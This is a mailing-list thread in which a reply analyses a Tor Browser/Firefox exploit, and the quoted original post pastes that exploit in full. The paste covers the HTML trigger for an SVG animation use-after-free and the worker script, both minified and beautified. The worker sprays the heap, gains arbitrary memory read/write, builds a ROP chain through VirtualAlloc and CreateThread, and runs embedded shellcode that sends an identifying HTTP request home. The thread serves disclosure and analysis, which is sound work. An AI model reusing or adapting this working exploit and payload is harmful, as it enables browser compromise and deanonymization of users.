For anyone looking into it, I tried to clean up cssbanner.js a little more. Reading the two files together, a few things are worth stating plainly. The first var (`thecode`) is not an encryption key: it is x86 shellcode packed two bytes per UTF-16 unit (the worker re-packs it with `charCodeAt(j)+65536*charCodeAt(j+1)` and appends it to the ROP buffer). It begins `fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 ...` (cld / call / pushad / PEB->Ldr module walk, i.e. the Metasploit "block_api" hash-resolver stub), and its tail decodes to plaintext `\r\nAccept-Encoding: gzip\r\n\r\n`, `\r\nCookie: MC=`, `ws2_32`, `IPHLPAPI` and `GET /0a82a108/05dc0122 HTTP/1.1\r\nHost: ` — so the payload loads ws2_32, opens a socket and sends an HTTP request; the MC cookie value is presumably machine-identifying data (IPHLPAPI suggests adapter info), but I have not verified that. The HTML side is the trigger: it sprays 0x80/0x100-byte ArrayBuffers, builds cross-referenced SVG `<animate>` elements, flips `begin` on one of them and then calls `pauseAnimations()`, which looks like a use-after-free in SVG animation timing, with the refilled buffers carrying `arrBase - offset` (offset 0x88 for Firefox 47+, else 0x90). The worker does the rest: it sprays fake object layouts at `arrBase` = 0x30000030, spins on `memory.length == len` until the corruption lands, then uses the corrupted `Uint32Array` as an arbitrary read/write primitive, parses xul's PE header (`MZ`/`PE` checks, import directory) to resolve `kernel32.dll!VirtualAlloc` and `CreateThread`, scans for gadgets (`94 c3` xchg eax,esp/ret; `58 c3` pop eax/ret; `89 01 c3` mov [ecx],eax/ret) and builds a ROP chain that calls VirtualAlloc(..., 0x1000, 0x1000, 0x40 = PAGE_EXECUTE_READWRITE) and then CreateThread on the shellcode. Everything is 32-bit Windows specific (PE parsing, 32-bit pointers, kernel32 imports); the only gating is on the Firefox version string (`vtable_offset` 300/304/308 for <41, 41.0.x-42.0, 43+). After "GREAT SUCCESS" the page terminates the worker, wipes `<head>`/`<body>` and redirects to member.php after 2 s, so a victim sees only mt.png — detection is more reliable on the network side (the GET path and MC cookie) or by looking for a Worker loading cssbanner.js than on the rendered page. Mozilla subsequently fixed this as CVE-2016-9079 (Firefox 50.0.2 / ESR 45.5.1, Tor Browser 6.0.7); check the advisory for the authoritative fixed-version list.
https://gist.github.com/kristovatlas/e03be5f10e48801aec88b0e23f00a3d7 I didn't actually compare execution before and after my changes, so caveat emptor. On Tue, Nov 29, 2016 at 6:31 PM, Kevin <[email protected]> wrote: > The first var looks like an encryption key. Just my humble observation > and food for thought. > > > > > On 11/29/2016 4:55 PM, [email protected] wrote: > >> This is an Javascript exploit actively used against TorBrowser NOW. It >> consists of one HTML and one CSS file, both pasted below and also >> de-obscured. The exact functionality is unknown but it's getting access to >> "VirtualAlloc" in "kernel32.dll" and goes from there. Please fix ASAP. I >> had to break the "thecode" line in two in order to post, remove ' + ' in >> the middle to restore it. >> >> HTML: >> >> <html> >> <head> >> <script> >> >> var thecode >> ='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u52 >> 8b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc1 >> 20\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u85 >> 78\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b >> 34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3b >> f8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8b >> d3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b >> 5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc0 >> 85\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5 >> ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u80 >> 29\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u50 >> 40\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u00 >> 01\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u89 >> 51\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u02 >> 48\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude >> 49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue8 >> 57\u00fa\u0000\u895e\u8dca\ua7bd\u0002 >> \ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u8900\u56d1 >> 
\ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002 >> \u5e00\u6856\u28a9\u8034\ud5ff\uc085\u840f' >> + >> '\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408 >> d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e >> 6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70 >> f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue78 >> 9\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u770 >> 9\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u300 >> 4\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8 >> b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u535 >> 7\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u685 >> 3\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc34 >> 9\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004 >> f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\ufff >> f\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a6 >> 7\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203 >> a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u470 >> 0\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u313 >> 2\u2032\u5448\u5054\u312f\u312e\u0a0d\ >> u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ >> u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ >> u0000\u0000\u4190'; >> >> >> var worker = new Worker('cssbanner.js'); >> >> worker.postMessage(thecode); >> >> var svgns = 'http://www.w3.org/2000/svg'; >> var heap80 = new Array(0x1000); >> var heap100 = new Array(0x4000); >> var block80 = new ArrayBuffer(0x80); >> var block100 = new ArrayBuffer(0x100); >> var sprayBase = undefined; >> var arrBase = undefined; >> >> var animateX = undefined; >> var containerA = undefined; >> >> var offset = 0x90; >> if >> (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigat >> or.userAgent)) >> { >> offset = 0x88; // versions 47.0 or greater >> } >> >> var $ = function(id) { return document.getElementById(id); } >> >> var exploit = 
function() >> { >> var u32 = new Uint32Array(block80) >> u32[0x2] = arrBase - offset; >> u32[0x8] = arrBase - offset; >> u32[0xE] = arrBase - offset; >> >> >> for(i = heap100.length/2; i < heap100.length; i++) >> { >> heap100[i] = block100.slice(0) >> } >> >> for(i = 0; i < heap80.length/2; i++) >> { >> heap80[i] = block80.slice(0) >> } >> >> animateX.setAttribute('begin', '59s') >> animateX.setAttribute('begin', '58s') >> >> for(i = heap80.length/2; i < heap80.length; i++) >> { >> heap80[i] = block80.slice(0) >> } >> >> for(i = heap100.length/2; i < heap100.length; i++) >> { >> heap100[i] = block100.slice(0) >> } >> >> animateX.setAttribute('begin', '10s') >> animateX.setAttribute('begin', '9s') >> window.dump('PAUSING!!! YAYA'); >> containerA.pauseAnimations(); >> } >> >> worker.onmessage = function(e) >> { >> worker.onmessage = function(e) >> { >> window.setTimeout(function() >> { >> worker.terminate(); >> >> document.body.innerHTML = ''; >> document.getElementsByTagName('head')[0].innerHTML = ''; >> document.body.setAttribute('onload', '') >> }, 1000); >> } >> >> arrBase = e.data; >> exploit(); >> } >> >> >> var idGenerator = function() >> { >> return 'id' + >> (((1+Math.random())*0x10000)|0).toString(16).substring(1); >> } >> >> >> var craftDOM = function() >> { >> containerA = document.createElementNS(svgns, 'svg') >> var containerB = document.createElementNS(svgns, 'svg'); >> >> animateX = document.createElementNS(svgns, 'animate') >> var animateA = document.createElementNS(svgns, 'animate') >> var animateB = document.createElementNS(svgns, 'animate') >> >> var animateC = document.createElementNS(svgns, 'animate') >> >> var idX = idGenerator(); >> var idA = idGenerator(); >> var idB = idGenerator(); >> var idC = idGenerator(); >> >> animateX.setAttribute('id', idX); >> animateA.setAttribute('id', idA); >> animateA.setAttribute('end', '50s'); >> animateB.setAttribute('id', idB); >> animateB.setAttribute('begin', '60s'); >> animateB.setAttribute('end', idC + 
'.end'); >> animateC.setAttribute('id', idC); >> animateC.setAttribute('begin', '10s'); >> animateC.setAttribute('end', idA + '.end'); >> >> containerA.appendChild(animateX) >> containerA.appendChild(animateA) >> containerA.appendChild(animateB) >> >> containerB.appendChild(animateC) >> >> document.body.appendChild(containerA); >> document.body.appendChild(containerB); >> } >> window.onload = craftDOM; >> // >> </script> >> >> <style> >> #mtdiv{ >> position: absolute; >> width: 960px; >> height: 166px; >> z-index: 15; >> top: 100px; >> left: 50%; >> margin: 0 0 0 -480px; >> } >> </style> >> </head> >> <body bgcolor='#2F3236'> >> >> <div id='mtdiv'> >> <img src='mt.png'/> >> </div> >> </body> >> <script> >> setTimeout('window.location = \'member.php\';', 2000); >> </script> >> >> </html> >> >> ============================================================ >> ======================================= >> >> content of "cssbanner.js": >> >> self.onmessage = function(msg) { >> >> thecode = msg.data; >> var pack = function (b) { var a = b >> 16; return String.fromCharCode(b >> & 65535) + String.fromCharCode(a) }; >> function >> Memory(b,a,f){this._base_addr=b;this._read=a;this._write=f;t >> his._abs_read=function(a){a>=this._base_addr?a=this._read(a- >> this._base_addr):(a=4294967295-this._base_addr+1+a,a=this._ >> read(a));return >> 0>a?4294967295+a+1:a};this._abs_write=function(a,b){a>=this. 
>> _base_addr?this._write(a-this._base_addr,b):(a=4294967295- >> this._base_addr+1+a,this._write(a,b))};this.readByte=function(a){return >> this.read(a)&255};this.readWord=function(a){return >> this.read(a)&65535};this.readDword=function(a){return this.read(a)}; >> this.read=function(a,b){if(a%4){var >> c=this._abs_read(a&4294967292),d=this._abs_read(a+4&42949672 >> 92),e=a%4;return >> c>>>8*e|d<<8*(4-e)}return >> this._abs_read(a)};this.readStr=function(a){for(var >> b="",c=0;;){if(32==c)return"";var >> d=this.readByte(a+c);if(0==d)break;b+=String.fromCharCode(d);c++}return >> b};this.write=function(a){}} >> function PE(b,a){this.mem=b;this.export_table=this.module_base=void >> 0;this.export_table_size=0;this.import_table=void >> 0;this.import_table_size=0;this.find_module_base=function(a) >> {for(a&=4294901760;a;){if(23117==this.mem.readWord(a))return >> this.module_base=a;a-=65536}};this._resolve_pe_structures=fu >> nction(){peFile=this.module_base+this.mem.readWord(this.modu >> le_base+60);if(17744!=this.mem.readDword(peFile))throw"Bad >> NT >> Signature";this.pe_file=peFile;this.optional_header=this.pe_ >> file+36;this.export_directory= >> this.module_base+this.mem.readDword(this.pe_file+120);this. >> export_directory_size=this.mem.readDword(this.pe_file+ >> 124);this.import_directory=this.module_base+this.mem. 
>> readDword(this.pe_file+128);this.import_directory_size= >> this.mem.readDword(this.pe_file+132)};this.resolve_ >> imported_function=function(a,b){void >> 0==this.import_directory&&this._resolve_pe_structures();for(var >> e=this.import_directory,c=e+this.import_directory_size;e<c;){var >> d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base >> );if(a.toUpperCase()== >> d.toUpperCase()){for(var >> c=this.mem.readDword(e)+this.module_base,e=this.mem.readDwor >> d(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!= >> d;){if(this.mem.readStr(d+this.module_base+2).toUpperCas >> e()==b.toUpperCase())return >> this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}br >> eak}e+=20}return >> 0};void 0!=a&&this.find_module_base(a)} >> function ROP(b,a){this.mem=b;this.pe=new >> PE(b,a);this.pe._resolve_pe_structures();this.module_base=th >> is.pe.module_base+4096;this.findSequence=function(a){for(var >> b=0;;){for(var >> e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base >> +b+c)==a[c]&&e==c)e++;else >> break;if(e==a.length)return >> this.module_base+b;b++}};this.findStackPivot=function(){return >> this.findSequence([148,195])};this.findPopRet=function(a){return >> this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void >> 0!=c?c:new ArrayBuffer(4096); >> c=new Uint32Array(c);var >> d=this.findStackPivot(),f=this.findPopRet("EAX"),g=this.pe. 
>> resolve_imported_function("kernel32.dll","VirtualAlloc");c[ >> 0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>> >> 2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a; >> c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836 <(343)%20597-3836> >> ;return >> c}} >> var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new >> Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b; >> convu32[1]=a;return >> convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return >> convu32[a]},sprayArrays=function(){for(var >> b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a<b.leng >> th;a+=512)b[a+1]=memory,b[a+21]=qword2Double(0,2),b[a+14]= >> qword2Double(arrBase+o1,0),b[a+(o1+8)/8]=qword2Double(arrBa >> se+o2,0),b[a+(o2+0)/8]=qword2Double(2,0),b[a+(o2+8)/8]= >> qword2Double(arrBase+ >> o3,arrBase+13),b[a+(o3+0)/8]=qword2Double(16,0),b[a+(o3+24) >> /8]=qword2Double(2,0),b[a+(o3+32)/8]=qword2Double(arrBase+o5 >> ,arrBase+o4),b[a+(o4+0)/8]=qword2Double(0,arrBase+o6),b[a+( >> o5+0)/8]=qword2Double(arrBase+o7,0),b[a+(o6+8)/8]=qword2Doub >> le(2,0),b[a+(o7+8)/8]=qword2Double(arrBase+o7+16,0), >> b[a+(o7+16)/8]=qword2Double(0,4026531840 <(402)%20653-1840> >> ),b[a+(o7+32)/8]=qword2Double(0,3220176896),b[ >> a+(o7+48)/8]=qword2Double(2,0),b[a+(o7+56)/8]=qword2Double( >> 1,0),b[a+(o7+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o7+112)/ >> 8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o7+168)/8]= >> qword2Double(0,2),b[a+(o9+0)/8]=qword2Double(arrBase+o10,2), >> b[a+(o10+0)/8]=qword2Double(2,0),b[a+(o10+8)/8]=qword2Double >> (0,268435456),b[a+(o11+8)/8]=qword2Double(arrBase+o11+16,0) >> ,b[a+(o11+16)/8]=qword2Double(0,4026531840 <(402)%20653-1840> >> ),b[a+(o11+32)/8]=qword2Double(0,3220176896),b[ >> a+(o11+48)/8]=qword2Double(2,0),b[a+(o11+56)/8]= >> qword2Double(1,0),b[a+(o11+96)/8]=qword2Double(arrBase+o8, >> arrBase+o8),b[a+(o11+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+ >> 
(o11+168)/8]=qword2Double(0,2);for(a=0;a<spr.length;a++) >> spr[a]=b.slice(0)},vtable_offset=300;/.*Firefox\/(41\.0( >> \.[1-2]|)|42\.0).*/.test(navigator.userAgent)?vtable_ >> offset=304:/.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/. >> test(navigator.userAgent)&&(vtable_offset=308); >> var spr=Array(400),arrBase=805306416,ropArrBuf=new >> ArrayBuffer(4096),o1=176,o2=256,o3=768,o4=832,o5=864,o6=928, >> o7=1024,o8=1280,o9=1344,o10=1376,o11=1536,oRop=1792,memory=new >> Uint32Array(16),len=memory.length,arr_index=0,arr_offset=0; >> fzero=qword2Double(0,0);0!=thecode.length%2&&(thecode+="\u90 >> 90");sprayArrays();postMessage(arrBase); >> for(memarrayloc=void 0;void >> 0==memarrayloc;)for(i=0;i<spr.length;i++)for(offset=0;offset >> <spr[i].length;offset+=512)if("object"!=typeof >> spr[i][offset+1]){memarrayloc=doubleFromFloat(spr[i][offset+ >> 1],0);arr_index=i;arr_offset=offset;spr[i][offset+(o2+0)/8]= >> qword2Double(65,0);spr[i][offset+(o2+8)/8]=qword2Double(arrB >> ase+o3,memarrayloc+27);for(j=0;33>j;j++)spr[i][offset+(o2+ >> 16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27) >> ;spr[i][offset+(o3+8)/8]=qword2Double(0,0);spr[i][ >> offset+(o5+0)/8]=qword2Double(arrBase+ >> o11,0);spr[i][offset+(o7+168)/8]=qword2Double(0,3);spr[i][o >> ffset+(o7+88)/8]=qword2Double(0,2);break}for(;memory.length==len;);var >> mem=new Memory(memarrayloc+48,function(b){return >> memory[b/4]},function(b,a){memory[b/4]=a}),xulPtr=mem.readDw >> ord(memarrayloc+12);spr[arr_index][arr_offset+1]=ropArrBuf >> ;ropPtr=mem.readDword(arrBase+8);spr[arr_index][arr_offset+ >> 1]=null;ropBase=mem.readDword(ropPtr+16);var >> rop=new >> ROP(mem,xulPtr);rop.ropChain(ropBase,vtable_offset,10,ropArrBuf); >> var backupESP=rop.findSequence([137,1,195]),ropChain=new >> Uint32Array(ropArrBuf);ropChain[0]=backupESP;CreateThread= >> rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");for(var >> i=0;i<ropChain.length&&3435973836!=ropChain[i];i++); >> 
ropChain[i++]=3296825488;ropChain[i++]=2048;ropChain[i+ >> +]=1347469361;ropChain[i++]=1528949584;ropChain[i++]=3092271187 >> ;ropChain[i++]=CreateThread;ropChain[i++]=3096498431;ro >> pChain[i++]=arrBase+16;ropChain[i++]=1955274891;ropChain[i++ >> ]=280697892;ropChain[i++]=704643071; >> ropChain[i++]=2425406428;ropChain[i++]=4294957800;ropChain[ >> i++]=2425393407;for(var >> j=0;j<thecode.length;j+=2)ropChain[i++]=thecode.charCodeAt( >> j)+65536*thecode.charCodeAt(j+1);spr[arr_index][arr_offset]= >> qword2Double(arrBase+16,0);spr[arr_index][arr_offset+3]= >> qword2Double(0,256);spr[arr_index][arr_offset+2]= >> qword2Double(ropBase,0);spr[arr_index][arr_offset+(o11+ >> 168)/8]=qword2Double(0,3);spr[arr_index][arr_offset+(o11+88) >> /8]=qword2Double(0,2);postMessage("GREAT >> SUCCESS"); >> >> }; >> >> >> Beautified: >> >> self.onmessage = >> function(msg) { >> >> thecode = msg.data; >> var pack = function (b) { var a = b >> 16; return String.fromCharCode(b >> & 65535) + String.fromCharCode(a) }; >> >> function Memory(b,a,f) >> { >> this._base_addr=b; >> this._read=a; >> this._write=f; >> this._abs_read = function(a) { >> a >= this._base_addr ? a = this._read( a - this._base_addr) : ( >> a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) ); >> return 0>a?4294967295+a+1:a >> >> }; >> this._abs_write = function(a,b) { >> a >= this._base_addr ? 
this._write(a - this._base_addr, b) : ( >> a >> = 4294967295 - this._base_addr + 1 + a, this._write(a,b) ) >> }; >> this.readByte = function(a) { >> return this.read(a) & 255 >> >> }; >> this.readWord = function(a) { >> return this.read(a) & 65535 >> }; >> this.readDword = function(a){ return this.read(a) }; >> this.read = function(a,b) { >> if (a%4) { >> var c = this._abs_read( a & 4294967292), >> d = this._abs_read( a+4 & 4294967292), >> e = a%4; >> return c>>>8*e | d<<8*(4-e) >> } >> return this._abs_read(a) >> }; >> this.readStr = function(a) { >> for(var b = "", c = 0;;) { >> if (32 == c) >> return ""; >> var d = this.readByte(a+c); >> if(0 == d) >> break; >> b += String.fromCharCode(d); >> c++ >> } >> return b >> >> }; >> this.write = function(a){} >> } >> function PE(b,a) { >> this.mem = b; >> this.export_table = this.module_base = void 0; >> this.export_table_size = 0; >> this.import_table = void 0; >> this.import_table_size = 0; >> this.find_module_base = function(a) { >> for(a &= 4294901760; a; ) { >> if(23117 == this.mem.readWord(a)) >> return this.module_base=a; >> a -= 65536 >> } >> }; >> this._resolve_pe_structures = function() { >> peFile = this.module_base + this.mem.readWord(this.module_ >> base+60); >> if(17744 != this.mem.readDword(peFile)) >> throw"Bad NT Signature"; >> this.pe_file = peFile; >> this.optional_header = this.pe_file+36; >> this.export_directory = >> this.module_base+this.mem.readDword(this.pe_file+120); >> this.export_directory_size = this.mem.readDword(this.pe_fil >> e+124); >> this.import_directory=this.module_base+this.mem.readDword( >> this.pe_file+128); >> this.import_directory_size=this.mem.readDword(this.pe_file+ >> 132)}; >> this.resolve_imported_function=function(a,b){ >> void 0==this.import_directory&&this >> ._resolve_pe_structures(); >> for(var >> e=this.import_directory,c=e+this.import_directory_size;e<c;){ >> var >> d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base); >> 
if(a.toUpperCase()==d.toUpperCase()){ >> for(var c = this.mem.readDword(e) + >> this.module_base, >> e = this.mem.readDword(e+16) + >> this.module_base, >> d = this.mem.readDword(c), >> f = 0 ; 0 !=d ;) >> { >> if(this.mem.readStr(d+this.mo >> dule_base+2).toUpperCase() >> == b.toUpperCase()) >> return this.mem.readDword(e+4*f); >> f++; >> d = this.mem.readDword(c+4*f) >> } >> break >> } >> e+=20 >> } >> return 0 >> }; >> void 0!=a && this.find_module_base(a) >> } >> function ROP(b,a){ >> this.mem = b; >> this.pe = new PE(b,a); >> this.pe._resolve_pe_structures(); >> this.module_base = this.pe.module_base+4096; >> this.findSequence = function(a) { >> for(var b=0;;) { >> for(var e=0,c=0;c<a.length;c++) >> if(this.mem.readByte(this.mod >> ule_base+b+c)==a[c]&&e==c) >> e++; >> else >> break; >> if(e==a.length) >> return this.module_base+b; >> b++ >> >> } >> >> }; >> this.findStackPivot=function() { >> return this.findSequence([148,195]) >> >> }; >> this.findPopRet=function(a) { >> return this.findSequence([88,195]) >> >> }; >> this.ropChain=function(a,b,e,c) { >> c = void 0 != c ? 
c : new ArrayBuffer(4096); >> c = new Uint32Array(c); >> var d = this.findStackPivot(), >> f = this.findPopRet("EAX"), >> g = >> this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc"); >> c[0]= f+1; >> c[1]= f; >> c[2]= a+b+4*e+4; >> c[3]= d; >> for(i=0;i<e;i++) >> c[(b>>2)+i] = d; >> d =(b+4>>2)+e; >> c[d++]=g; >> c[d++]=a+(b+4*e+28); >> c[d++]=a; >> c[d++]=4096; >> c[d++]=4096; >> c[d++]=64; >> c[d++]=3435973836; >> return c >> } >> } >> var conv=new ArrayBuffer(8), >> convf64=new Float64Array(conv), >> convu32=new Uint32Array(conv), >> qword2Double=function(b,a) { >> convu32[0]=b; >> convu32[1]=a; >> return convf64[0] >> }, >> doubleFromFloat = function(b,a) { >> convf64[0]=b; >> return convu32[a] >> >> }, >> sprayArrays=function() { >> for(var b=Array(262138),a=0;262138>a;a++) >> b[a]=fzero; >> for(a=0;a<b.length;a+=512) >> b[a+1] = memory, >> b[a+21] = qword2Double(0,2), >> b[a+14] = qword2Double(arrBase+o1,0), >> b[a+(o1+8)/8] = qword2Double(arrBase+o2,0), >> b[a+(o2+0)/8] = qword2Double(2,0), >> b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13), >> b[a+(o3+0)/8] = qword2Double(16,0), >> b[a+(o3+24)/8] = qword2Double(2,0), >> b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4), >> b[a+(o4+0)/8] = qword2Double(0,arrBase+o6), >> b[a+(o5+0)/8] = qword2Double(arrBase+o7,0), >> b[a+(o6+8)/8] = qword2Double(2,0), >> b[a+(o7+8)/8] = qword2Double(arrBase+o7+16,0), >> b[a+(o7+16)/8] = qword2Double(0,4026531840), >> b[a+(o7+32)/8] = qword2Double(0,3220176896), >> b[a+(o7+48)/8] = qword2Double(2,0), >> b[a+(o7+56)/8] = qword2Double(1,0), >> b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8), >> b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16), >> b[a+(o7+168)/8] = qword2Double(0,2), >> b[a+(o9+0)/8] = qword2Double(arrBase+o10,2), >> b[a+(o10+0)/8] = qword2Double(2,0), >> b[a+(o10+8)/8] = qword2Double(0,268435456), >> b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0), >> b[a+(o11+16)/8] = qword2Double(0,4026531840), >> b[a+(o11+32)/8] = 
qword2Double(0,3220176896), >> b[a+(o11+48)/8] = qword2Double(2,0), >> b[a+(o11+56)/8] = qword2Double(1,0), >> b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8), >> b[a+(o11+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16), >> b[a+(o11+168)/8] = qword2Double(0,2); >> for(a=0;a<spr.length;a++) >> spr[a]=b.slice(0) >> }, vtable_offset=300; >> /.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)? >> vtable_offset=304 : >> /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigat >> or.userAgent) >> && (vtable_offset=308); >> var spr=Array(400), >> arrBase=805306416, >> ropArrBuf=new ArrayBuffer(4096), >> o1=176, >> o2=256, >> o3=768, >> o4=832, >> o5=864, >> o6=928, >> o7=1024, >> o8=1280, >> o9=1344, >> o10=1376, >> o11=1536, >> oRop=1792, >> memory=new Uint32Array(16), >> len=memory.length, >> arr_index=0, >> arr_offset=0; >> fzero=qword2Double(0,0); >> 0!=thecode.length%2&&(thecode+="\u9090"); >> sprayArrays(); >> postMessage(arrBase); >> for(memarrayloc=void 0;void 0==memarrayloc;) >> for(i=0;i<spr.length;i++) >> for(offset=0;offset<spr[i].length;offset+=512) >> if("object" != typeof spr[i][offset+1]) { >> memarrayloc=doubleFromFloat(spr[i][offset+1],0); >> arr_index=i; >> arr_offset=offset; >> spr[i][offset+(o2+0)/8]=qword2Double(65,0); >> spr[i][offset+(o2+8)/8]=qword2 >> Double(arrBase+o3,memarrayloc+27); >> for(j=0;33>j;j++) >> spr[i][offset+(o2+16)/8+j]=qwo >> rd2Double(memarrayloc+27,memarrayloc+27); >> spr[i][offset+(o3+8)/8]=qword2Double(0,0); >> spr[i][offset+(o5+0)/8]=qword2 >> Double(arrBase+o11,0); >> spr[i][offset+(o7+168)/8]=qword2Double(0,3); >> spr[i][offset+(o7+88)/8]=qword2Double(0,2); >> break >> } >> for(;memory.length==len;); >> var mem=new Memory(memarrayloc+48, >> function(b){return memory[b/4]}, >> function(b,a){memory[b/4]=a}), >> xulPtr=mem.readDword(memarrayloc+12); >> spr[arr_index][arr_offset+1]=ropArrBuf; >> ropPtr=mem.readDword(arrBase+8); >> spr[arr_index][arr_offset+1]=null; >> ropBase=mem.readDword(ropPtr+16); >> 
var rop=new ROP(mem,xulPtr); >> rop.ropChain(ropBase,vtable_offset,10,ropArrBuf); >> var backupESP=rop.findSequence([137,1,195]), ropChain=new >> Uint32Array(ropArrBuf); >> ropChain[0]=backupESP; >> CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll >> ","CreateThread"); >> for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++); >> ropChain[i++]=3296825488; >> ropChain[i++]=2048; >> ropChain[i++]=1347469361; >> ropChain[i++]=1528949584; >> ropChain[i++]=3092271187; >> ropChain[i++]=CreateThread; >> ropChain[i++]=3096498431; >> ropChain[i++]=arrBase+16; >> ropChain[i++]=1955274891; >> ropChain[i++]=280697892; >> ropChain[i++]=704643071; >> ropChain[i++]=2425406428; >> ropChain[i++]=4294957800; >> ropChain[i++]=2425393407; >> for (var j=0;j<thecode.length;j+=2) >> ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeA >> t(j+1); >> spr[arr_index][arr_offset]=qword2Double(arrBase+16,0); >> spr[arr_index][arr_offset+3]=qword2Double(0,256); >> spr[arr_index][arr_offset+2]=qword2Double(ropBase,0); >> spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3); >> spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2); >> postMessage("GREAT SUCCESS"); >> }; >> >> >> >> > > > --- > This email has been checked for viruses by Avast antivirus software. > https://www.avast.com/antivirus > > > -- > tor-talk mailing list - [email protected] > To unsubscribe or change other settings go to > https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-talk > -- tor-talk mailing list - [email protected] To unsubscribe or change other settings go to https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-talk
